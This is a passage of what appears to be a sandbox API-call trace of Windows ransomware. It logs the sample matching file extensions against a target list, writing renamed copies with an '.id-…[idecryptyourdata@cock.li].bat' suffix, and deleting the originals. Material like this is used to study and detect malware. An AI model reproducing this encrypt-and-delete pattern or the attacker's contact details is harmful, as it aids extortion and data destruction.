"c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0055.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0055.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0055.589] lstrlenW (lpString=".doc") returned 4 [0055.589] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0055.589] lstrlenW (lpString=".docx") returned 5 [0055.589] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0055.589] lstrlenW (lpString=".pdf") returned 4 [0055.589] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0055.589] lstrlenW (lpString=".xls") returned 4 [0055.589] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0055.589] lstrlenW (lpString=".xlsx") returned 5 [0055.589] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0055.589] lstrlenW (lpString=".ppt") returned 4 [0055.589] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0055.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0055.589] lstrlenW (lpString=".zip") returned 4 [0055.589] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0055.589] lstrlenW (lpString=".rar") returned 4 [0055.589] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0055.589] lstrlenW (lpString=".bz2") returned 4 [0055.589] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0055.589] lstrlenW (lpString=".7z") returned 3 [0055.589] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0055.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0055.589] lstrlenW (lpString=".dbf") returned 4 [0055.589] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0055.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0055.589] lstrlenW (lpString=".1cd") returned 4 [0055.590] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0055.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0055.590] lstrlenW (lpString=".jpg") returned 4 [0055.590] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0055.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0055.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0055.590] lstrlenW (lpString=".doc") returned 4 [0055.590] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0055.590] lstrlenW (lpString=".docx") returned 5 [0055.590] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0055.590] lstrlenW (lpString=".pdf") returned 4 [0055.590] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0055.590] lstrlenW (lpString=".xls") returned 4 [0055.590] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0055.590] lstrlenW (lpString=".xlsx") returned 5 [0055.590] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0055.590] lstrlenW (lpString=".ppt") returned 4 [0055.590] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0055.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0055.590] lstrlenW (lpString=".zip") returned 4 [0055.590] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0055.590] lstrlenW (lpString=".rar") returned 4 [0055.590] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0055.590] lstrlenW (lpString=".bz2") returned 4 [0055.590] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0055.590] lstrlenW (lpString=".7z") returned 3 [0055.590] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0055.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0055.590] lstrlenW (lpString=".dbf") returned 4 [0055.590] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0055.590] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0055.591] lstrlenW (lpString=".1cd") returned 4 [0055.591] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0055.591] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 69 [0055.591] lstrlenW (lpString=".jpg") returned 4 [0055.591] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0055.591] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0055.591] lstrlenW (lpString="insertbase.xml") returned 14 [0055.591] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0055.597] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=903) returned 1 [0055.597] CloseHandle (hObject=0x2c4) returned 1 [0055.598] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml")) returned 0x20 [0055.598] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.598] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0055.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0055.598] lstrlenW (lpString=".doc") returned 4 [0055.598] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.598] lstrlenW (lpString=".docx") returned 5 [0055.598] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0055.598] lstrlenW (lpString=".pdf") returned 4 [0055.598] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.598] lstrlenW (lpString=".xls") returned 4 [0055.598] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.598] lstrlenW (lpString=".xlsx") returned 5 [0055.598] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0055.598] lstrlenW (lpString=".ppt") returned 4 [0055.598] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0055.598] lstrlenW (lpString=".zip") returned 4 [0055.598] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.598] lstrlenW (lpString=".rar") returned 4 [0055.598] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.598] lstrlenW (lpString=".bz2") returned 4 [0055.598] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.598] lstrlenW (lpString=".7z") returned 3 [0055.598] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0055.599] lstrlenW (lpString=".dbf") returned 4 [0055.599] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0055.599] lstrlenW (lpString=".1cd") returned 4 [0055.599] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0055.599] lstrlenW (lpString=".jpg") returned 4 [0055.599] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0055.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0055.599] lstrlenW (lpString=".doc") returned 4 [0055.599] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.599] lstrlenW (lpString=".docx") returned 5 [0055.599] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0055.599] lstrlenW (lpString=".pdf") returned 4 [0055.599] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.599] lstrlenW (lpString=".xls") returned 4 [0055.599] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.599] lstrlenW (lpString=".xlsx") returned 5 [0055.599] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0055.599] lstrlenW (lpString=".ppt") returned 4 [0055.599] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0055.599] lstrlenW (lpString=".zip") returned 4 [0055.599] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.599] lstrlenW (lpString=".rar") returned 4 [0055.599] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.599] lstrlenW (lpString=".bz2") returned 4 [0055.599] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.599] lstrlenW (lpString=".7z") returned 3 [0055.599] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0055.599] lstrlenW (lpString=".dbf") returned 4 [0055.599] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0055.600] lstrlenW (lpString=".1cd") returned 4 [0055.600] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 86 [0055.600] lstrlenW (lpString=".jpg") returned 4 [0055.600] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.600] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0055.600] lstrlenW (lpString="ea.xml") returned 6 [0055.600] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0055.621] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=384) returned 1 [0055.621] CloseHandle (hObject=0x2c4) returned 1 [0055.621] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml")) returned 0x20 [0055.621] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.622] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0055.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0055.622] lstrlenW (lpString=".doc") returned 4 [0055.622] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.622] lstrlenW (lpString=".docx") returned 5 [0055.622] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0055.622] lstrlenW (lpString=".pdf") returned 4 [0055.622] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.622] lstrlenW (lpString=".xls") returned 4 [0055.622] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.622] lstrlenW (lpString=".xlsx") returned 5 [0055.622] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0055.622] lstrlenW (lpString=".ppt") returned 4 [0055.622] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.622] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0055.622] lstrlenW (lpString=".zip") returned 4 [0055.622] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.622] lstrlenW (lpString=".rar") returned 4 [0055.622] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.622] lstrlenW (lpString=".bz2") returned 4 [0055.622] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.623] lstrlenW (lpString=".7z") returned 3 [0055.623] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.623] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 78 [0055.623] lstrlenW (lpString=".dbf") returned 4 [0055.623] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0056.410] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0056.821] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.822] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.822] CreateFileW (lpFileName="C:\\Program Files\\desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\desktop.ini.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.822] GetLastError () returned 0x0 [0056.822] ReadFile (in: hFile=0x2e4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xae, lpOverlapped=0x0) returned 1 [0056.822] WriteFile (in: hFile=0x344, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xb0, lpOverlapped=0x0) returned 1 [0056.823] ReadFile (in: hFile=0x2e4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0056.823] WriteFile (in: hFile=0x344, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xea, lpOverlapped=0x0) returned 1 [0056.823] SetEndOfFile (hFile=0x344) returned 1 [0056.824] CloseHandle (hObject=0x344) returned 1 [0056.824] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.824] SetEndOfFile (hFile=0x2e4) returned 1 [0056.825] CloseHandle (hObject=0x2e4) returned 1 [0056.825] SetFileAttributesW (lpFileName="C:\\Program Files\\desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x26) returned 1 [0056.825] DeleteFileW (lpFileName="C:\\Program Files\\desktop.ini" (normalized: "c:\\program files\\desktop.ini")) returned 1 [0056.826] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0056.826] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0056.826] lstrlenW (lpString=".doc") returned 4 [0056.826] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0056.826] lstrlenW (lpString=".docx") returned 5 [0056.826] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0056.826] lstrlenW (lpString=".pdf") returned 4 [0056.826] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0056.826] lstrlenW (lpString=".xls") returned 4 [0056.826] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0056.826] lstrlenW (lpString=".xlsx") returned 5 [0056.826] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0056.826] lstrlenW (lpString=".ppt") returned 4 [0056.826] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0056.826] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0056.826] lstrlenW (lpString=".zip") returned 4 [0056.826] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0056.826] lstrlenW (lpString=".rar") returned 4 [0056.826] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0056.826] lstrlenW (lpString=".bz2") returned 4 [0056.826] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0056.826] lstrlenW (lpString=".7z") returned 3 [0056.826] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0056.826] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0056.826] lstrlenW (lpString=".dbf") returned 4 [0056.826] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0056.826] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0056.826] lstrlenW (lpString=".1cd") returned 4 [0056.827] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0056.827] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0056.827] lstrlenW (lpString=".jpg") returned 4 [0056.827] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0056.827] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0056.827] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0056.827] lstrlenW (lpString=".doc") returned 4 [0056.827] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0056.827] lstrlenW (lpString=".docx") returned 5 [0056.827] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0056.827] lstrlenW (lpString=".pdf") returned 4 [0056.827] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0056.827] lstrlenW (lpString=".xls") returned 4 [0056.827] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0056.827] lstrlenW (lpString=".xlsx") returned 5 [0056.827] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0056.827] lstrlenW (lpString=".ppt") returned 4 [0056.827] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0056.827] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0056.827] lstrlenW (lpString=".zip") returned 4 [0056.827] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0056.827] lstrlenW (lpString=".rar") returned 4 [0056.827] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0056.827] lstrlenW (lpString=".bz2") returned 4 [0056.827] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0056.827] lstrlenW (lpString=".7z") returned 3 [0056.827] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0056.828] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0056.828] lstrlenW (lpString=".dbf") returned 4 [0056.828] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0056.828] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0056.828] lstrlenW (lpString=".1cd") returned 4 [0056.828] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0056.828] lstrlenW (lpString="C:\\Program Files\\desktop.ini") returned 28 [0056.828] lstrlenW (lpString=".jpg") returned 4 [0056.828] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0056.828] lstrcmpiW (lpString1=".txt", lpString2=".bat") returned 1 [0056.828] lstrlenW (lpString="Xusage.txt") returned 10 [0056.828] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0056.828] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=1423) returned 1 [0056.828] CloseHandle (hObject=0x2e4) returned 1 [0056.828] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt")) returned 0x20 [0056.828] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.828] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0056.829] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.829] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.829] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0056.829] GetLastError () returned 0x0 [0056.830] ReadFile (in: hFile=0x2e4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x58f, lpOverlapped=0x0) returned 1 [0056.899] WriteFile (in: hFile=0x344, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x590, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x590, lpOverlapped=0x0) returned 1 [0056.900] ReadFile (in: hFile=0x2e4, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0056.900] WriteFile (in: hFile=0x344, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xe8, lpOverlapped=0x0) returned 1 [0056.900] SetEndOfFile (hFile=0x344) returned 1 [0056.900] CloseHandle (hObject=0x344) returned 1 [0056.901] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.901] SetEndOfFile (hFile=0x2e4) returned 1 [0056.902] CloseHandle (hObject=0x2e4) returned 1 [0056.902] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0056.902] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt")) returned 1 [0056.902] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0056.902] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0056.902] lstrlenW (lpString=".doc") returned 4 [0056.902] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0056.902] lstrlenW (lpString=".docx") returned 5 [0056.902] lstrcmpiW (lpString1=".docx", lpString2="e.txt") returned -1 [0056.902] lstrlenW (lpString=".pdf") returned 4 [0056.902] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0056.902] lstrlenW (lpString=".xls") returned 4 [0056.902] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0056.902] lstrlenW (lpString=".xlsx") returned 5 [0056.903] lstrcmpiW (lpString1=".xlsx", lpString2="e.txt") returned -1 [0056.903] lstrlenW (lpString=".ppt") returned 4 [0056.903] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0056.903] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0056.903] lstrlenW (lpString=".zip") returned 4 [0056.903] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0056.903] lstrlenW (lpString=".rar") returned 4 [0056.903] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0056.903] lstrlenW (lpString=".bz2") returned 4 [0056.903] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0056.903] lstrlenW (lpString=".7z") returned 3 [0056.903] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0056.903] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt") returned 56 [0056.903] lstrlenW (lpString=".dbf") returned 4 [0056.903] 